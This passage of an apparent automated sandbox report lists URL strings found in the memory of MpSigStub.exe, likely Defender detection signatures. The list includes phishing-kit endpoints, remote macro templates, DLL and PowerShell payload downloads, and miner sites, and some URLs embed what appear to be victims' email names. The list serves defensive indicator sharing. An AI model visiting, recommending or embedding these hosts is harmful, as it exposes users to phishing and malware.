Source: MpSigStub.exe, 00000023.00000003.18285687047.0000015B1B29A000.00000004.00000001.sdmp String found in binary or memory: https://mz.ht-aslice.online/?e=erdinc.gok
Source: MpSigStub.exe, 00000023.00000003.18345035369.0000015B1B176000.00000004.00000001.sdmp String found in binary or memory: https://mz.ht-aslice.online/?e=mike.platt
Source: MpSigStub.exe, 00000023.00000003.18430467796.0000015B1AE1C000.00000004.00000001.sdmp String found in binary or memory: https://n9.cl/d9fii
Source: MpSigStub.exe, 00000023.00000003.18326506118.0000015B1A705000.00000004.00000001.sdmp String found in binary or memory: https://navigator.fun/wp-content/plugins/refer-a-friend-for-woocommerce-by-wpgens/public/js/mcb8abrb
Source: MpSigStub.exe, 00000023.00000003.18432136853.0000015B1BFE7000.00000004.00000001.sdmp String found in binary or memory: https://netorgft3012202.sharepoint.com/:b:/s/investments/ewhzfsivbvbdn1vhk8eejpcbnbcaan_xlbd5e7fn2lp
Source: MpSigStub.exe, 00000023.00000003.18345035369.0000015B1B176000.00000004.00000001.sdmp String found in binary or memory: https://neuroconversions.com/wp-content/
Source: MpSigStub.exe, 00000023.00000003.18283593829.0000015B1A80D000.00000004.00000001.sdmp String found in binary or memory: https://neuroconversions.com/wp-content/plugins/po4/excelz/index.php?email=
Source: MpSigStub.exe, 00000023.00000003.18327508493.0000015B1B6A0000.00000004.00000001.sdmp String found in binary or memory: https://neverlose.cc/
Source: MpSigStub.exe, 00000023.00000003.18432136853.0000015B1BFE7000.00000004.00000001.sdmp String found in binary or memory: https://newsiest-grid.000webhostapp.com/dhl/dhla/dhl%20auto/index.php?email=kani.junichi
Source: MpSigStub.exe, 00000023.00000003.18284892419.0000015B1AF67000.00000004.00000001.sdmp String found in binary or memory: https://newtrp.com/e8/rexifly.php
Source: MpSigStub.exe, 00000023.00000003.18335432095.0000015B1A956000.00000004.00000001.sdmp String found in binary or memory: https://newwets.com/zip/document.php
Source: MpSigStub.exe, 00000023.00000003.18345359888.0000015B1A789000.00000004.00000001.sdmp String found in binary or memory: https://nexustiles.com/y29yaw5uzs5oewxhbmrac2fudgfjcnv6y291bnr5lnvz
Source: MpSigStub.exe, 00000023.00000003.18402123411.0000015B1B2B1000.00000004.00000001.sdmp String found in binary or memory: https://nhacaiuytin888.com/mail/now.php
Source: MpSigStub.exe, 00000023.00000003.18285687047.0000015B1B29A000.00000004.00000001.sdmp String found in binary or memory: https://nicoleiman.com/zmxvcmvuy2lhqhnpbxrly2guys1zdgfylmvkds5zzw==
Source: MpSigStub.exe, 00000023.00000003.18430797596.0000015B1AE5D000.00000004.00000001.sdmp String found in binary or memory: https://nizarazu.ru/tyui/?activity=4789652
Source: MpSigStub.exe, 00000023.00000003.18324547737.0000015B1B0B1000.00000004.00000001.sdmp String found in binary or memory: https://nonamesv.xsiazon.xyz/?e=
Source: MpSigStub.exe, 00000023.00000003.18315106599.0000015B1B858000.00000004.00000001.sdmp String found in binary or memory: https://norsecompassgroup.com/4eqmrlzmq9r/lipa.html
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp String found in binary or memory: https://notabug.org/microsoft-office/word-templates/raw/master/template.dotm
Source: MpSigStub.exe, 00000023.00000003.18303445859.0000015B1B86F000.00000004.00000001.sdmp String found in binary or memory: https://notafiscaleletronica-e.com/master/
Source: MpSigStub.exe, 00000023.00000003.18428517155.0000015B1C06B000.00000004.00000001.sdmp String found in binary or memory: https://notes.topix21century.com/asp/kys_allow_get.asp?name=getkys.kys
Source: MpSigStub.exe, 00000023.00000003.18429220503.0000015B1A3C2000.00000004.00000001.sdmp String found in binary or memory: https://novaworld-resort.com/wp-admin/user/delis/ite1/links.doc
Source: MpSigStub.exe, 00000023.00000003.18299377795.0000015B1AEE3000.00000004.00000001.sdmp String found in binary or memory: https://nowfoundation.org.uk/hx0smmmbiw/haurt.html
Source: MpSigStub.exe, 00000023.00000003.18426889733.0000015B1BBC7000.00000004.00000001.sdmp String found in binary or memory: https://oauth2.googleapis
Source: MpSigStub.exe, 00000023.00000003.18432465628.0000015B1B9FA000.00000004.00000001.sdmp String found in binary or memory: https://objectstorage.uk-london-1.oraclecloud.com/n/lrxg46lu57ma/
Source: MpSigStub.exe, 00000023.00000003.18299634028.0000015B1AF1A000.00000004.00000001.sdmp String found in binary or memory: https://objectstorage.us-ashburn-1.oraclecloud.com/n/idb0azuxzsop/b/viperwee/o/voicee.mp3
Source: MpSigStub.exe, 00000023.00000003.18285687047.0000015B1B29A000.00000004.00000001.sdmp String found in binary or memory: https://objectstorage.us-phoenix-1.oraclecloud.com/n/axfwptiilgjl/b/azu/o/vn.html#support
Source: MpSigStub.exe, 00000023.00000003.18293662919.0000015B1BCD0000.00000004.00000001.sdmp String found in binary or memory: https://ocsp.quovadisoffshore.com0
Source: MpSigStub.exe, 00000023.00000003.18313187984.0000015B1B305000.00000004.00000001.sdmp String found in binary or memory: https://odbtgld.s3.eu-central-1.amazonaws.com/setups.exe
Source: MpSigStub.exe, 00000023.00000003.18313187984.0000015B1B305000.00000004.00000001.sdmp String found in binary or memory: https://odbtgld.s3.eu-central-1.amazonaws.com/setups.exeac
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: https://oemands.dk/xmlrpc.php
Source: MpSigStub.exe, 00000023.00000003.18327176542.0000015B1B61C000.00000004.00000001.sdmp String found in binary or memory: https://office.com/start/myaccount.aspx
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: https://office.insureusun.com/?e=simona.merzagora
Source: MpSigStub.exe, 00000023.00000003.18315106599.0000015B1B858000.00000004.00000001.sdmp String found in binary or memory: https://office.live.com/start/
Source: MpSigStub.exe, 00000023.00000003.18433793263.0000015B1AEE2000.00000004.00000001.sdmp String found in binary or memory: https://office365.club/web/content.dotm
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: https://ohgstd-adnazad.c9users.io/update/validate/
Source: MpSigStub.exe, 00000023.00000003.18431115827.0000015B1AFEA000.00000004.00000001.sdmp String found in binary or memory: https://oidblueprin.at/3/str.dll
Source: MpSigStub.exe, 00000023.00000003.18293045113.0000015B1BC4D000.00000004.00000001.sdmp String found in binary or memory: https://oksearch.org/xa2/click.html
Source: MpSigStub.exe, 00000023.00000003.18326506118.0000015B1A705000.00000004.00000001.sdmp String found in binary or memory: https://olisseytravel.az/wp-content/themes/themesnewsa/js/zxz/new.php
Source: MpSigStub.exe, 00000023.00000003.18315964598.0000015B1A481000.00000004.00000001.sdmp String found in binary or memory: https://olympiacus.accesscam.org/pdf/opo.php
Source: MpSigStub.exe, 00000023.00000003.18299696915.0000015B1AF24000.00000004.00000001.sdmp String found in binary or memory: https://one.co.il
Source: MpSigStub.exe, 00000023.00000003.18425885690.0000015B1BCD0000.00000004.00000001.sdmp String found in binary or memory: https://onedrive.live.com/download.aspx?cid=7df9938cb8d94df3&authkey=%21ajy8jfax0aqsibs&resid=7df993
Source: MpSigStub.exe, 00000023.00000003.18299377795.0000015B1AEE3000.00000004.00000001.sdmp String found in binary or memory: https://opposedent.com/css/main.css/send.css
Source: MpSigStub.exe, 00000023.00000003.18432805737.0000015B1BA3B000.00000004.00000001.sdmp String found in binary or memory: https://tiw0dspxozds.azurewebsites.net/fdoi
Source: MpSigStub.exe, 00000023.00000003.18423368163.0000015B1C1B6000.00000004.00000001.sdmp String found in binary or memory: https://todayutos.info
Source: MpSigStub.exe, 00000023.00000003.18315106599.0000015B1B858000.00000004.00000001.sdmp String found in binary or memory: https://tomamate.si/
Source: MpSigStub.exe, 00000023.00000003.18298772777.0000015B1A8DA000.00000004.00000001.sdmp String found in binary or memory: https://toulousa.com/omg/rockspa.php
Source: MpSigStub.exe, 00000023.00000003.18306868118.0000015B1AA1D000.00000004.00000001.sdmp String found in binary or memory: https://towingnow.ca/LvR2HWHdQ.php
Source: MpSigStub.exe, 00000023.00000003.18318671001.0000015B1C4A2000.00000004.00000001.sdmp String found in binary or memory: https://tph786.com/gym/assets/css/
Source: MpSigStub.exe, 00000023.00000003.18345035369.0000015B1B176000.00000004.00000001.sdmp String found in binary or memory: https://tr.im/1azmq)
Source: MpSigStub.exe, 00000023.00000003.18329049691.0000015B1ABCB000.00000004.00000001.sdmp String found in binary or memory: https://track.fourtiz.com
Source: MpSigStub.exe, 00000023.00000003.18319967809.0000015B1BE5C000.00000004.00000001.sdmp String found in binary or memory: https://tradingdashboards.com/
Source: MpSigStub.exe, 00000023.00000003.18337818328.0000015B1BB10000.00000004.00000001.sdmp String found in binary or memory: https://trafffi.ru/123?utm_term=
Source: MpSigStub.exe, 00000023.00000003.18337818328.0000015B1BB10000.00000004.00000001.sdmp String found in binary or memory: https://trafffi.ru/aws?utm_term=
Source: MpSigStub.exe, 00000023.00000003.18289945062.0000015B1AE5F000.00000004.00000001.sdmp String found in binary or memory: https://trafffi.ru/shook?utm_term=
Source: MpSigStub.exe, 00000023.00000003.18289945062.0000015B1AE5F000.00000004.00000001.sdmp String found in binary or memory: https://trafffi.ru/strik?utm_term=
Source: MpSigStub.exe, 00000023.00000003.18289945062.0000015B1AE5F000.00000004.00000001.sdmp String found in binary or memory: https://traffking.ru/123?utm_term=
Source: MpSigStub.exe, 00000023.00000003.18289945062.0000015B1AE5F000.00000004.00000001.sdmp String found in binary or memory: https://traffking.ru/aws?utm_term=
Source: MpSigStub.exe, 00000023.00000003.18316647369.0000015B1B557000.00000004.00000001.sdmp String found in binary or memory: https://traffking.ru/shook?utm_term=
Source: MpSigStub.exe, 00000023.00000003.18316647369.0000015B1B557000.00000004.00000001.sdmp String found in binary or memory: https://traffking.ru/strik?utm_term=
Source: MpSigStub.exe, 00000023.00000003.18335134155.0000015B1A914000.00000004.00000001.sdmp String found in binary or memory: https://transfer.sh/
Source: MpSigStub.exe, 00000023.00000003.18423368163.0000015B1C1B6000.00000004.00000001.sdmp String found in binary or memory: https://transfer.sh/yyaum/svchost.sh
Source: MpSigStub.exe, 00000023.00000003.18289945062.0000015B1AE5F000.00000004.00000001.sdmp String found in binary or memory: https://trex-miner.com
Source: MpSigStub.exe, 00000023.00000003.18424133495.0000015B1C0F0000.00000004.00000001.sdmp String found in binary or memory: https://tubestore.com.br/wp-content/p_bn/
Source: MpSigStub.exe, 00000023.00000003.18337818328.0000015B1BB10000.00000004.00000001.sdmp String found in binary or memory: https://tweetperks.com/lbim8w/
Source: MpSigStub.exe, 00000023.00000003.18426595439.0000015B1BB86000.00000004.00000001.sdmp String found in binary or memory: https://twitter.com/eduClient
Source: MpSigStub.exe, 00000023.00000003.18423368163.0000015B1C1B6000.00000004.00000001.sdmp String found in binary or memory: https://u.lewd.se/
Source: MpSigStub.exe, 00000023.00000003.18310002934.0000015B1B40D000.00000004.00000001.sdmp String found in binary or memory: https://u.nu/920yx
Source: MpSigStub.exe, 00000023.00000003.18310002934.0000015B1B40D000.00000004.00000001.sdmp String found in binary or memory: https://u.nu/e6b2i
Source: MpSigStub.exe, 00000023.00000003.18430467796.0000015B1AE1C000.00000004.00000001.sdmp String found in binary or memory: https://u.nu/edc63
Source: MpSigStub.exe, 00000023.00000003.18427547415.0000015B1B8F2000.00000004.00000001.sdmp String found in binary or memory: https://u6882561.ct.sendgrid.net/wf/click?upn=o3yy7nxymwp5cpvqnxo3xb8sbgrdkj8vj
Source: MpSigStub.exe, 00000023.00000003.18432136853.0000015B1BFE7000.00000004.00000001.sdmp String found in binary or memory: https://u6947877.ct.sendgrid.net/wf/click?upn=aum5tbbw0s-2boddc9wvl76ffmwkftnihk7jwmiyskchpxyq1lorjb
Source: MpSigStub.exe, 00000023.00000003.18430467796.0000015B1AE1C000.00000004.00000001.sdmp String found in binary or memory: https://uaeub.com/ds/161120.gif
Source: MpSigStub.exe, 00000023.00000003.18423819335.0000015B1B1FA000.00000004.00000001.sdmp String found in binary or memory: https://ufile.io/xjsrzal2
Source: MpSigStub.exe, 00000023.00000003.18425885690.0000015B1BCD0000.00000004.00000001.sdmp String found in binary or memory: https://uis.public360online.com:443/biz/v2-pbr/docprod/templates/_uis%20moteinnkalling_referat.docx
Source: MpSigStub.exe, 00000023.00000003.18434111043.0000015B1AF23000.00000004.00000001.sdmp String found in binary or memory: https://ulvis.net/ujt
Source: MpSigStub.exe, 00000023.00000003.18291256000.0000015B1B9B9000.00000004.00000001.sdmp String found in binary or memory: https://unitedstates1.cp.wd.microsoft.us/WdCpSrvc.asmx
Source: MpSigStub.exe, 00000023.00000003.18291256000.0000015B1B9B9000.00000004.00000001.sdmp String found in binary or memory: https://unitedstates1.cp.wd.microsoft.us/wdcp.svc/bond/submitReport
Source: MpSigStub.exe, 00000023.00000003.18291256000.0000015B1B9B9000.00000004.00000001.sdmp String found in binary or memory: https://unitedstates1.cp.wd.microsoft.us/wdcp.svc/submitReport
Source: MpSigStub.exe, 00000023.00000003.18291256000.0000015B1B9B9000.00000004.00000001.sdmp String found in binary or memory: https://unitedstates2.cp.wd.microsoft.us/WdCpSrvc.asmx
Source: MpSigStub.exe, 00000023.00000003.18291256000.0000015B1B9B9000.00000004.00000001.sdmp String found in binary or memory: https://unitedstates2.cp.wd.microsoft.us/wdcp.svc/bond/submitReport
Source: MpSigStub.exe, 00000023.00000003.18291256000.0000015B1B9B9000.00000004.00000001.sdmp String found in binary or memory: https://unitedstates2.cp.wd.microsoft.us/wdcp.svc/submitReport
Source: MpSigStub.exe, 00000023.00000003.18291256000.0000015B1B9B9000.00000004.00000001.sdmp String found in binary or memory: https://unitedstates4.cp.wd.microsoft.us/WdCpSrvc.asmx
Source: MpSigStub.exe, 00000023.00000003.18291256000.0000015B1B9B9000.00000004.00000001.sdmp String found in binary or memory: https://unitedstates4.cp.wd.microsoft.us/wdcp.svc/bond/submitReport
Source: MpSigStub.exe, 00000023.00000003.18291256000.0000015B1B9B9000.00000004.00000001.sdmp String found in binary or memory: https://unitedstates4.cp.wd.microsoft.us/wdcp.svc/submitReport
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp String found in binary or memory: https://updatesdomainn.ml/
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp String found in binary or memory: https://updatesdomainn.ml/post.php
Source: MpSigStub.exe, 00000023.00000003.18316647369.0000015B1B557000.00000004.00000001.sdmp String found in binary or memory: https://upload.cat/
Source: MpSigStub.exe, 00000023.00000003.18319632958.0000015B1BDD9000.00000004.00000001.sdmp String found in binary or memory: https://upload.wikimedia.org/wikipedia/commons/
Source: MpSigStub.exe, 00000023.00000003.18429220503.0000015B1A3C2000.00000004.00000001.sdmp String found in binary or memory: https://uploadvirus.com/uploads/
Source: MpSigStub.exe, 00000023.00000003.18316647369.0000015B1B557000.00000004.00000001.sdmp String found in binary or memory: https://upt.fastsearch.me/
Source: MpSigStub.exe, 00000023.00000003.18349004213.0000015B1A9DB000.00000004.00000001.sdmp String found in binary or memory: https://upurl.me/m7oiv
Source: MpSigStub.exe, 00000023.00000003.18428865493.0000015B1A381000.00000004.00000001.sdmp String found in binary or memory: https://upurl.me/vvkzd
Source: MpSigStub.exe, 00000023.00000003.18315106599.0000015B1B858000.00000004.00000001.sdmp String found in binary or memory: https://urbanhomefitness.com/file/excelzz/index.php?email=
Source: MpSigStub.exe, 00000023.00000003.18432805737.0000015B1BA3B000.00000004.00000001.sdmp String found in binary or memory: https://uringvermi.at/3/zet.dll
Source: MpSigStub.exe, 00000023.00000003.18322924550.0000015B1B0F3000.00000004.00000001.sdmp String found in binary or memory: https://utilities.pcpitstop.com
Source: MpSigStub.exe, 00000023.00000003.18335432095.0000015B1A956000.00000004.00000001.sdmp String found in binary or memory: https://vaqww.dyndns.dk/tolly5/
Source: MpSigStub.exe, 00000023.00000003.18344475813.0000015B1C1D6000.00000004.00000001.sdmp String found in binary or memory: https://vaqww.dyndns.dk/tolly5/next.php
Source: MpSigStub.exe, 00000023.00000003.18432136853.0000015B1BFE7000.00000004.00000001.sdmp String found in binary or memory: https://victoriaparkmazda-my.sharepoint.com/personal/ann_victoriaparkmazda_co_uk/_layouts/15/guestac
Source: MpSigStub.exe, 00000023.00000003.18320270470.0000015B1B515000.00000004.00000001.sdmp String found in binary or memory: https://vieeewen.org/ddy/next.php
Source: MpSigStub.exe, 00000023.00000003.18320270470.0000015B1B515000.00000004.00000001.sdmp String found in binary or memory: https://vieeewen.org/tgg/next.php
Source: MpSigStub.exe, 00000023.00000003.18424989390.0000015B1C5AA000.00000004.00000001.sdmp String found in binary or memory: https://viro.mleydier.fr/noauth
Source: MpSigStub.exe, 00000023.00000003.18285687047.0000015B1B29A000.00000004.00000001.sdmp String found in binary or memory: https://vm.jt-voicem.club/?e=ckoonce
Source: MpSigStub.exe, 00000023.00000003.18285687047.0000015B1B29A000.00000004.00000001.sdmp String found in binary or memory: https://vm.jt-voicem.club/?e=ljeffcoat
Source: MpSigStub.exe, 00000023.00000003.18402123411.0000015B1B2B1000.00000004.00000001.sdmp String found in binary or memory: https://vmnames.ssvoipsx.xyz/?e=%25
Source: MpSigStub.exe, 00000023.00000003.18340752801.0000015B1B72C000.00000004.00000001.sdmp String found in binary or memory: https://vmnapi.net/vmap/1.0/yhs/ms/yhs/?vmimp=
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: https://vn.pr-nijim.xyz/?e=soumu
Source: MpSigStub.exe, 00000023.00000003.18285687047.0000015B1B29A000.00000004.00000001.sdmp String found in binary or memory: https://voice.vm-business.online/?e=jscott
Source: MpSigStub.exe, 00000023.00000003.18336414128.0000015B1BF22000.00000004.00000001.sdmp String found in binary or memory: https://voicemailss.hozoimn.xyz/?e=twfyawx5bi5kywvja2vslw1peebnyxjhdghvbkvszwn0cmljlmnvbq==
Source: MpSigStub.exe, 00000023.00000003.18299634028.0000015B1AF1A000.00000004.00000001.sdmp String found in binary or memory: https://voipses.eononass.xyz/?e=%25
Source: MpSigStub.exe, 00000023.00000003.18299634028.0000015B1AF1A000.00000004.00000001.sdmp String found in binary or memory: https://voipss.snonames.xyz/?e=%25
Source: MpSigStub.exe, 00000023.00000003.18346827221.0000015B1B1B9000.00000004.00000001.sdmp String found in binary or memory: https://vooydvclhlqukhdvrsxe.com/tx.dll
Source: MpSigStub.exe, 00000023.00000003.18431115827.0000015B1AFEA000.00000004.00000001.sdmp String found in binary or memory: https://voyya.com.mx/wp-content/themes/Divi/incl(
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp String found in binary or memory: https://vr2oq.csb.app/
Source: MpSigStub.exe, 00000023.00000003.18324547737.0000015B1B0B1000.00000004.00000001.sdmp String found in binary or memory: https://vsit.site/
Source: MpSigStub.exe, 00000023.00000003.18332554033.0000015B1C0AF000.00000004.00000001.sdmp String found in binary or memory: https://vsit.site/4a8gk
Source: MpSigStub.exe, 00000023.00000003.18332554033.0000015B1C0AF000.00000004.00000001.sdmp String found in binary or memory: https://vsit.site/ghqec
Source: MpSigStub.exe, 00000023.00000003.18332554033.0000015B1C0AF000.00000004.00000001.sdmp String found in binary or memory: https://vsit.site/xndcx
Source: MpSigStub.exe, 00000023.00000003.18313512818.0000015B1B346000.00000004.00000001.sdmp String found in binary or memory: https://vtsamples.commondatastorage.googleapis.com/
Source: MpSigStub.exe, 00000023.00000003.18341814408.0000015B1C2D4000.00000004.00000001.sdmp String found in binary or memory: https://wac.edgecastcdn.net/800952/5b595c13-aea5-4a6c-a099-d29c4678f6f2-api/gcbs
Source: MpSigStub.exe, 00000023.00000003.18341814408.0000015B1C2D4000.00000004.00000001.sdmp String found in binary or memory: https://wac.edgecastcdn.net/800952/5b595c13-aea5-4a6c-a099-d29c4678f6f2-api/gccs
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: https://wacochamber.com/
Source: MpSigStub.exe, 00000023.00000003.18342870635.0000015B1AB89000.00000004.00000001.sdmp String found in binary or memory: https://we.tl/t-ccUfUrQOhF
Source: MpSigStub.exe, 00000023.00000003.18343611807.0000015B1BD13000.00000004.00000001.sdmp String found in binary or memory: https://web.certicamara.com/marco-legal0Z
Source: MpSigStub.exe, 00000023.00000003.18319632958.0000015B1BDD9000.00000004.00000001.sdmp String found in binary or memory: https://webmailx.space/ml/ama/4/excel/log.php
Source: MpSigStub.exe, 00000023.00000003.18345359888.0000015B1A789000.00000004.00000001.sdmp String found in binary or memory: https://world-wwt.com/wp-admin/css/colors/coffee/reportexcelnew.php
Source: MpSigStub.exe, 00000023.00000003.18430797596.0000015B1AE5D000.00000004.00000001.sdmp String found in binary or memory: https://ws.onehub.com/files/7w1372el
Source: MpSigStub.exe, 00000023.00000003.18329979252.0000015B1AE1C000.00000004.00000001.sdmp String found in binary or memory: https://www-cdn.getwebcake.com/
Source: MpSigStub.exe, 00000023.00000003.18426595439.0000015B1BB86000.00000004.00000001.sdmp String found in binary or memory: https://www.4shared.com/download/pJhaizQgba/wd11.exe
Source: MpSigStub.exe, 00000023.00000003.18429220503.0000015B1A3C2000.00000004.00000001.sdmp String found in binary or memory: https://www.4shared.com/web/directdownload/plcok719ce/hhnjnm.d9cc6b8210cf7f938818851
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: https://www.admos-gleitlager.de/feed/
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: https://www.advokathuset.dk/auktioner/tvangsauktioner/saadan-koeber-du-paa-tvangsauktion
Source: MpSigStub.exe, 00000023.00000003.18331238413.0000015B1AAC2000.00000004.00000001.sdmp String found in binary or memory: https://www.aec.com.my/aec_5.5/public/ph/h/page.php
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: https://www.anca-aste.it/uploads/form/boeing_spe_leos_logo.jpg
Source: MpSigStub.exe, 00000023.00000003.18335432095.0000015B1A956000.00000004.00000001.sdmp String found in binary or memory: https://www.anf.es/AC/ACTAS/789230
Source: MpSigStub.exe, 00000023.00000003.18335432095.0000015B1A956000.00000004.00000001.sdmp String found in binary or memory: https://www.anf.es/AC/ANFServerCA.crl0
Source: MpSigStub.exe, 00000023.00000003.18335432095.0000015B1A956000.00000004.00000001.sdmp String found in binary or memory: https://www.anf.es/address/)1(0&
Source: MpSigStub.exe, 00000023.00000003.18340752801.0000015B1B72C000.00000004.00000001.sdmp String found in binary or memory: https://www.anthonyshandyman.com/irn/toolzlord.php
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp String found in binary or memory: https://www.apple.com/appleca/0
Source: MpSigStub.exe, 00000023.00000003.18429220503.0000015B1A3C2000.00000004.00000001.sdmp String found in binary or memory: https://www.astedams.it/uploads/frame/61.dotm
Source: MpSigStub.exe, 00000023.00000003.18429220503.0000015B1A3C2000.00000004.00000001.sdmp String found in binary or memory: https://www.astedams.it/uploads/template/17.dotm
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: https://www.augenta.com/site/xmlrpc.php
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: https://www.autopfand24.de/pfandhaus-in-meiner-naehe/
Source: MpSigStub.exe, 00000023.00000003.18432136853.0000015B1BFE7000.00000004.00000001.sdmp String found in binary or memory: https://www.bancanetempresarial.banamex
Source: MpSigStub.exe, 00000023.00000003.18299696915.0000015B1AF24000.00000004.00000001.sdmp, MpSigStub.exe, 00000023.00000003.18424133495.0000015B1C0F0000.00000004.00000001.sdmp String found in binary or memory: https://www.bitly.com/
Source: MpSigStub.exe, 00000023.00000003.18425422653.0000015B1C5EB000.00000004.00000001.sdmp String found in binary or memory: https://www.bitly.com/ad
Source: MpSigStub.exe, 00000023.00000003.18429220503.0000015B1A3C2000.00000004.00000001.sdmp String found in binary or memory: https://www.bitly.com/bug41
Source: MpSigStub.exe, 00000023.00000003.18327176542.0000015B1B61C000.00000004.00000001.sdmp String found in binary or memory: https://www.bizsonet.com/wp-admin/js/jquery
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: https://www.botanicinnovations.com/wp-admin/admin-ajax.php
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: https://www.brawnmediany.com
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: https://www.cactusthebrand.com/xmlrpc.php
Source: MpSigStub.exe, 00000023.00000003.18425422653.0000015B1C5EB000.00000004.00000001.sdmp String found in binary or memory: https://www.cipnet.cl/wp-content/godd/godaddy-rd18/next.php
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: https://www.coastalbridgeadvisors.com
Source: MpSigStub.exe, 00000023.00000003.18326614272.0000015B1A717000.00000004.00000001.sdmp String found in binary or memory: https://www.cogmobile.com/next1.php
Source: MpSigStub.exe, 00000023.00000003.18340752801.0000015B1B72C000.00000004.00000001.sdmp String found in binary or memory: https://www.coinblind.com/lib/coinblind_beta.js
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: https://www.creamery201.com/
Source: MpSigStub.exe, 00000023.00000003.18286537046.0000015B1A3C2000.00000004.00000001.sdmp String found in binary or memory: https://www.dfib.net/calc.exe
Source: MpSigStub.exe, 00000023.00000003.18350085117.0000015B1B6E3000.00000004.00000001.sdmp String found in binary or memory: https://www.digicert.com/CPS0
Source: MpSigStub.exe, 00000023.00000003.18310002934.0000015B1B40D000.00000004.00000001.sdmp String found in binary or memory: https://www.doganturan.av.tr/wp-admin/alu/reportdhlnew2.php
Source: MpSigStub.exe, 00000023.00000003.18323230598.0000015B1B134000.00000004.00000001.sdmp String found in binary or memory: https://www.doganturan.av.tr/wp-admin/bigi/reportdhlnew2.php
Source: MpSigStub.exe, 00000023.00000003.18340752801.0000015B1B72C000.00000004.00000001.sdmp, MpSigStub.exe, 00000023.00000003.18322610510.0000015B1A546000.00000004.00000001.sdmp String found in binary or memory: https://www.dropbox.com/
Source: MpSigStub.exe, 00000023.00000003.18432465628.0000015B1B9FA000.00000004.00000001.sdmp String found in binary or memory: https://www.dropbox.com/s/
Source: MpSigStub.exe, 00000023.00000003.18327176542.0000015B1B61C000.00000004.00000001.sdmp String found in binary or memory: https://www.dropbox.com/s/41zf98knyy5atko/001_01.ps1?dl
Source: MpSigStub.exe, 00000023.00000003.18327176542.0000015B1B61C000.00000004.00000001.sdmp String found in binary or memory: https://www.dropbox.com/s/dh8flnrogfq1h1w/001.ps1?dl
Source: MpSigStub.exe, 00000023.00000003.18429220503.0000015B1A3C2000.00000004.00000001.sdmp String found in binary or memory: https://www.dropbox.com/s/dmprbq9mxwylpht/zs437zfig68f.doc?dl=1
Source: MpSigStub.exe, 00000023.00000003.18423368163.0000015B1C1B6000.00000004.00000001.sdmp String found in binary or memory: https://www.dropbox.com/s/foughx315flj51u/worddata.dotm?dl=1
Source: MpSigStub.exe, 00000023.00000003.18345359888.0000015B1A789000.00000004.00000001.sdmp String found in binary or memory: https://www.dropbox.com/s/jxfyg8a6oj13z7i/factuur%20006643-89845.zip
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: https://www.dropbox.com/s/r9xrl3meju6lr19/payment_advice.uue?dl=1)
Source: MpSigStub.exe, 00000023.00000003.18298772777.0000015B1A8DA000.00000004.00000001.sdmp String found in binary or memory: https://www.e-gold.com
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp String found in binary or memory: https://www.e-gold.com/
Source: MpSigStub.exe, 00000023.00000003.18326614272.0000015B1A717000.00000004.00000001.sdmp String found in binary or memory: https://www.e-gold.com/acct/
Source: MpSigStub.exe, 00000023.00000003.18298772777.0000015B1A8DA000.00000004.00000001.sdmp String found in binary or memory: https://www.e-gold.com/acct/accountinfo.asp
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp String found in binary or memory: https://www.e-gold.com/acct/ai.asp?c=AS
Source: MpSigStub.exe, 00000023.00000003.18298772777.0000015B1A8DA000.00000004.00000001.sdmp String found in binary or memory: https://www.e-gold.com/acct/verify.asp
Source: MpSigStub.exe, 00000023.00000003.18298772777.0000015B1A8DA000.00000004.00000001.sdmp String found in binary or memory: https://www.e-gold.com/acct/verify.asp&BAction=
Source: MpSigStub.exe, 00000023.00000003.18345359888.0000015B1A789000.00000004.00000001.sdmp String found in binary or memory: https://www.econoticias.com.bo/aa/excel.php
Source: MpSigStub.exe, 00000023.00000003.18345359888.0000015B1A789000.00000004.00000001.sdmp String found in binary or memory: https://www.econoticias.com.bo/bb/excel.php
Source: MpSigStub.exe, 00000023.00000003.18345359888.0000015B1A789000.00000004.00000001.sdmp String found in binary or memory: https://www.econoticias.com.bo/cc/excel.php
Source: MpSigStub.exe, 00000023.00000003.18350843348.0000015B1B3CA000.00000004.00000001.sdmp String found in binary or memory: https://www.elcom.admin.ch
Source: MpSigStub.exe, 00000023.00000003.18402123411.0000015B1B2B1000.00000004.00000001.sdmp String found in binary or memory: https://www.emergencydentistlondonpro.co.uk/hddu2vgb7muait.php
